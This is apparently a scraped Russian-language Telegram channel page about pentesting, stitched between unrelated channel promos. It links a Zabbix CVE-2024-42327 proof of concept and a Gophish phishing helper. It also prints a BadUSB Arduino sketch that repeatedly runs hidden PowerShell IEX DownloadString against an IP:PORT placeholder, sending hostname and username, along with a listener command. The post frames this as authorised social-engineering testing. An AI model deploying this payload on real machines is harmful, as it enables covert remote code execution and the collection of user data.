Imperial Orchestra — большой симфонический оркестр, организатор шоу саундтреков: Cinema Medley, Hans Zimmer’s Universe и др.
Афиша и билеты на сайтах: cinemamedley.ru www.hanszimmer.ru imperialhall.spb.ru
Last updated 6 days, 4 hours ago
Send your beautiful menfess about the beauty world right here, Beauties! <3
On Duty: Close.
KRITIK & SARAN: @.Ghiaabot (BUKAN BOT SEND PERTANYAAN!)
Partnership: @.TheBeautyBaseBot @TBBPS
Banned: @BannedTBB
Rants: @BeautyRants
Sub—Unit: @Kitchenfess
Last updated 1 day, 17 hours ago
Легендарные экошубы и другая верхняя одежда
Интернет-магазин: only-me.ru
Чат для заказа: @onlymeconsultant
ВКонтакте: vk.com/wearonlyme
Last updated 3 days, 17 hours ago
CVE-2024-42327 😌
Немного опоздал, но, учитывая то, как забикс заполонил корпоративные сети и оценку уязвимости в 9.9 баллов по шкале CVSS, пок не утратил свою актуальность:
https://github.com/depers-rus/CVE-2024-42327
Для эксплуатации нужна валидная учетка с любой ролью, учетки которой могут взаимодействовать с апишкой.
Пок написан под постгрю, для других субд адаптируйте синтаксис запроса.
Сети и системы передачи информации
Пожалуй, это один из лучших курсов, которые я когда-либо видел по практическим сетям. Сколько бы раз я ни рассказывал про него, всегда все просили поделиться ссылкой. И вот оно случилось: @sadykovildar дал добро (за что ему большое спасибо), а значит, ловите🎸
https://sadykov.notion.site/1-bb9630269fa14ce4b21f5b10339af168
Т.к. репа в ноушене, для просмотра лекционного материала, используйте VPN.
gophishGroupsAdder 😩
Всем ку! Давно не виделись!
Думаю, очевидно, что 4 квартал никого не щадит)
Исходя из задачек и того материала, над которым в данный момент работаю, решил написать следующий простенький скриптец:
https://github.com/E1tex/gophishGroupsAdder
Мало кто любит ~~бдсм~~ вишинг, но нужен этот скрипт по большому счету только для этого.
В случаях, когда заказчик пуляет в вас миллион клиентов, которых надо будет отзвонить, а соответственно и таргетированно отослать письма, ручками заносить всех пользаков в разные группы было бы слишком долго. Тут вам и поможет gophishGroupsAdder, работающий на основе Gophish API. Enjoy!
Ребята, всем спасибо за участие в нашем конкурсе?
Мы определили 3 победителей, которые завтра заберут у нас свои призы???
?1 место @scan87
?2 место @Casuaq
?3 место @mr4nd3r5on
Все участники поразили нас скоростью и профессионализмом. Благодарим всех! В следующий раз сделаем конкурс посложнее. Нам подсветили наши недочеты, а мы заметили как легко и играючи вы со всем справились☠️
Всем еще раз спасибо за участие! ???
Двигаем от второго выхода автозаводской ? Карточки все еще есть..
BadUSB Check-Script ?
Если во время выполнения работы по социальной инженерии — будь то через флешки или физику, — нам не требуется делать пробив, мы можем просто отправить запрос на подконтрольный сервер и залогировать входящие запросы.
Поскольку заказчику необходимо знать, кому проводить обучение после завершения кампании ?, нам нужно собрать минимальную информацию о хосте, с которого был отправлен запрос. В скрипте ниже, используя переменные окружения, мы отправляем с виндовой тачки запрос, содержащий hostname и username.
Помимо сбора информации, такой подход помогает не потерять запросы, которые мы можем пропустить из-за надоедливых сканов со стороны Shodan, Censys и пр.
Скрипт, который я написал и активно использую, работает с модулем Paensy, разбор которого был ранее на канале:
```
#include
void setup() {
delay(5000);
SetDelay(100);
while (true) {
delay(5000);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
Keyboard.press(KEY_LEFT_SHIFT);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.releaseAll();
delay(500);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press(KEY_SPACE);
Keyboard.releaseAll();
delay(500);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
PressKey(KEY_BACKSPACE, 1);
delay(1800000);
}
}
void loop() {
}
```
А для того, чтобы отлавливать запросы, мы можем использовать простой Python HTTP Server:
sudo PYTHONUNBUFFERED=x python3 \-m http.server PORT &> ../http.server.log & echo $! > ../http.server.pid
Здесь мы:1. Отключаем буферизацию вывода;
2. Перенаправляем как stderr, так и stdout в лог-файл;
3. Записываем pid в файл, чтоб не потерять его и спокойно убить процесс, в случае необходимости.
По основному скрипту:1. Основной скрипт для Arduino меняет язык раскладки, используя всего два сочетания клавиш, что можно изменить по вашему усмотрению;
2. Если цель еще не на рабочем месте, можно вставить плату и забыть о ней— скрипт выполняется каждые полчаса в бесконечном цикле;
Telegram
FCK HARDER
Teensy 2.0 Bad USB ***😱*** https://teletype.in/@e1tex/teensybadusb В данной статье мы рассмотрим процесс создания устройства Bad USB с использованием платы на базе Arduino - Teensy 2.0. Я продемонстрирую шаги по созданию и программированию этого маленького,…
Друзья, сообщество Standoff.
Благодарим всех, кто играл сегодня с нами. Конечно же мы благодарим наших союзников, отличных ребят, экспертов своего дела, а также благодарим наших соперников, с которыми создали по-настоящему накаленную атмосферу.
Обращаемся к вам, чтобы обрамить наши последующие действия в понятный и доходчивый посыл: Мы не хотим дискредитировать вашу хорошую игру, но не согласны с тем, что организаторы обеспечили честную игру для каждой команды.
На этом мероприятии мы и вы наблюдали, следующие факты, не позволяющие признавать происходящее настоящим сравнением сил сторон.
Те риски, что не смогла реализовать Государство S были неподготовлены к игре и нерешабельны, другая часть рисков так и не была доступна для решения в ходе игры из-за ошибок в системах скада и работе сети.
Нашим соперникам досталось 3 сегмента сети для атак, которые весь год находились на полигоне 365, а заверения организаторов о том, что они обновили инфраструктуру и задачи не оказались правдой.
Организаторы знали, что команда Pr1me, которая с самого начала отказалась играть, и даже на этапе подготовки сообщила об этом, была включена в общий зачет. А в последствии принесла победное значение коэффициента команде государства F своим "внезапным" отсутствием.
Как утверждалось в презентации мероприятия: "Победит самое сплоченное государство". Определенно государство S вышло победителем в этой схватке, как самое сплоченное, сыгранное и объединившееся. Мы благодарим за игру наших соратников, мы также благодарим за игру наших соперников.
В сложившейся ситуации мы вынуждены принять решение об отказе от участия в дальнейших активностях мероприятия Standoff 13.
True0xA3 (ТруОАЗ)
Imperial Orchestra — большой симфонический оркестр, организатор шоу саундтреков: Cinema Medley, Hans Zimmer’s Universe и др.
Афиша и билеты на сайтах: cinemamedley.ru www.hanszimmer.ru imperialhall.spb.ru
Last updated 6 days, 4 hours ago
Send your beautiful menfess about the beauty world right here, Beauties! <3
On Duty: Close.
KRITIK & SARAN: @.Ghiaabot (BUKAN BOT SEND PERTANYAAN!)
Partnership: @.TheBeautyBaseBot @TBBPS
Banned: @BannedTBB
Rants: @BeautyRants
Sub—Unit: @Kitchenfess
Last updated 1 day, 17 hours ago
Легендарные экошубы и другая верхняя одежда
Интернет-магазин: only-me.ru
Чат для заказа: @onlymeconsultant
ВКонтакте: vk.com/wearonlyme
Last updated 3 days, 17 hours ago